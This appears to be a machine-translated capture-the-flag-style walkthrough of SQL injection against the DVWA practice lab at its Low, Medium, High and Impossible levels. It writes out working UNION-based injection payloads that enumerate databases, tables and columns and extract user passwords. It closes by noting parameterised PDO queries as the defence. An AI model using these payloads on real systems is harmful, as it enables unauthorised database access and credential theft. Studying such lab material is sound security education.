SQL Injection
The experimental environment and construction of this paper should be visited: DVWA environment construction
SQL注入就是通过把sql语句插入到web表单提交或输入页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令
General flow of SQL injection:
1, Judgment injection point
2. Determine injection type
3. Determine the database type
4, access to the database permissions, the right to raise
Low Level
Let us first analyze the source code, and then step into the operation to verify our analysis
Key parts of the source code:
As we can see, there is a clear injection of vulnerability when the query parameter ID is not filtered at all.
1, then we try to determine the injection point
You can enter a single quotation mark to see if an error is judged
Can inject
At the same time we see that the ID parameter is processed with the quotation mark ' $id ', indicating that this is a character-type injection.
2. How to judge the character type injection
Test method: For example
Http://127.0.0.1/test/test2.php?user=admin ' and ' 1 ' = ' 1 return success
Http://127.0.0.1/test/test2.php?user=admin ' and ' 1 ' = ' 2 return error
When we enter 1 ' and ' 1 ' = ' 1, the statement changes: Select * from user where user = ' 1 ' and ' 1 ' = ' 1 '
At this point, and the left of the establishment, the right two characters of 1 must also be equal, set up, so we set the entire query statement.
When the ' 1 ' = ' 1 is changed to ' 1 ' = ' 2, the entire query statement returns an error
The query technique we use here is to close the single quotation mark in the original query statement by using the statement that we can guess, through single quotes, to achieve the results we want.
Of course the query judgment statement, not only these, for example, we can change the inside of the ' 1 ' = ' 1 ' a ' = ' a effect is the same.
- Test at low level, enter 1 ' and ' 1 ' = ' 1 query succeeded
- Input 1 ' and ' 1 ' = ' 2 query failed
3, when we have the above judgment, you can get access to the query.
(1) Number of judging fields
- Enter 1 ' ORDER by 3 #查询失败
- Enter 1 ' ORDER by 2 #查询成功
- Note: The reason for adding the # number here is the effect of the comment. When we enter this query statement, it becomes: Select first_name,last_name from users WHERE user_id = ' 1 ' ORDER by # '
We can see that the extra single quotation marks are dropped by the # comment.
(2) Determine the database currently in use
- Input 1 ' Union select 1,database () #
The DVWA database is currently in use
(3) Determine the tables in the database.
- Input 1 ' union select 1,table_name from Information_schema.tables where table_schema= ' Dvwa ' #
Two tables are stored in the DVWA database.
(4) Judging the fields in the Users table
- Input 1 ' union select 1,column_name from Information_schema.columns where table_name= ' users ' #
Get a lot of fields and we'll then hack the field contents of user and password
(5) burst the contents of the User,password field
- Input: 1 ' Union select User,password from Users #
The user name and password in this database were successfully burst.
Medium level
Take a look at the key code
- The mysql_real_escape_string () function escapes special characters in strings used in SQL statements.
The following characters are affected:
? \x00
? \ n
? \ r
? \
? ‘
? "
? \x1a
This function controls the user's input to a certain extent. However, there is no quotation mark when reading the ID parameter on the query statement, this is different from the low level, this is the digital injection. When this injection is encountered, the function of the above is absent. Because we don't enter those special strings when we inject them.
1, when we do not know how to judge the case is a digital injection.
Test method: For example
Http://127.0.0.1/test/test.php?id=1 and 1=1 return success
Http://127.0.0.1/test/test.php?id=1 and 1=2 return error
When we go to SQL injection, the server will execute a query to the database, in the case of digital injection, the query is generally the same as the select from user where id= $id
The $id here is submitted by Get,post (common submission method), of course, here is the use of the Get way to submit (judging by: The submission is displayed in the URL).
When we enter the judgment statement: and 1=1, the query statement becomes: Select from user where ID =1 and 1=1
At this point and the left is established, while the right 1=1 is also established. We know that when using and, the result must be true on both sides to return true. So according to our judgment statement, both sides of the return are true, and the entire Select query statement is successful.
Of course if the input 1=2, because it is not true, so the entire statement is not valid, return error
Start experimenting with tests according to the experiment:
- Enter 1 and 1=1:
Because this is a drop-down box, we can inject by checking the elements, modifying the values of value, and using BP to grab the packet and then change the packet to pass the parameter. I am here because of the Java environment a little bit of a problem not fixed in time, you do not need BP. Submit
Query successful
- Change the value to 1 and 1=2. Submit
The query failed. Can prove to be digital injection.
The following operation is almost the same as the low level, but will be used in the single quotation mark, the well number to get rid of it. Very simple
Number of fields: 1 ORDER by 2
Check Database: 1 Union select 1,database ()
Table in database: 1 Union select 1,table_name from Information_schema.tables where table_schema= ' Dvwa '
Check the Users table for fields: 1 Union SELECT column_name from Information_schema.columns where table_name= ' users '
Burst field Content: 1 Union select User,password from Users
High level
View Key Code
This is about the same as the low level. Limit 1 is added after the query statement, meaning that only the first record that is queried is returned.
Through the above experiment we all know that our query results are many, the first record is the normal result. This will not allow us to see some of the following malicious query results.
In fact, here, the limit 1 of the condition Plus and no, because his parameter ID is a character type. In order to avoid the subsequent single quotes at our low level, we chose to comment them out. Here you add a limit of 1, or the same can be commented out. It's totally useless.
For example, the input 1 ' and 1=1 # query statement becomes
Select first_name last_name from users where user_id = ' 1 ' and 1=1 # ' limit 1
After the well number is commented out, the query condition is established.
- Let's test it out in an experimental environment.
- Find out all the records
Facts prove that our analysis is not wrong, next or that set of fierce operation, check the number of fields, database, check table, check fields, explode content. Not to repeat in one by one.
Impossible level
View Key Source
Limit the number of query results returned in the code to be output, preventing a large number of data leaks. The PDO technology is used to isolate the code and data so that the data entered by the user is no longer executed as code. Achieve the goal of eliminating SQL injection. Invincible!
I also know very little about PDO technology, and then after the PDO technology has mastered the time to supplement it.
SQL injection of DVWA article